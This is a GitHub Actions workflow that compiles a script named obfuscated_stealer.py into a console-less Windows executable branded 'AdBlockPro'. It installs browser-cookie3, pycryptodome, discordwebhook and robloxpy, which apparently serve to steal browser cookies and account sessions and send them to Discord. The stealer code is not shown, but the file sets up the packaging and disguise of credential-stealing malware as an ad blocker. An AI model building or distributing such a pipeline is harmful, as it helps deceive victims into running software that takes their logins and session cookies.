name: Build Windows Executable

on:
  push:
    branches: [ main, master ]
  pull_request:
    branches: [ main, master ]
  workflow_dispatch:

jobs:
  build:
    runs-on: windows-latest

    steps:
    - uses: actions/checkout@v4

    - name: Set up Python
      uses: actions/setup-python@v4
      with:
        python-version: '3.11'

    - name: Install dependencies
      run: |
        python -m pip install --upgrade pip
        pip install pyinstaller browser-cookie3 pycryptodome pywin32 discordwebhook httpx requests robloxpy

    - name: Build executable
      run: |
        pyinstaller --onefile --noconsole --name AdBlockPro --icon=icon32.ico --add-data "icon32.ico;." --version-file version_info.txt obfuscated_stealer.py

    - name: Upload executable
      uses: actions/upload-artifact@v4
      with:
        name: AdBlockPro-Windows-Executable
        path: dist/AdBlockPro.exe
        retention-days: 30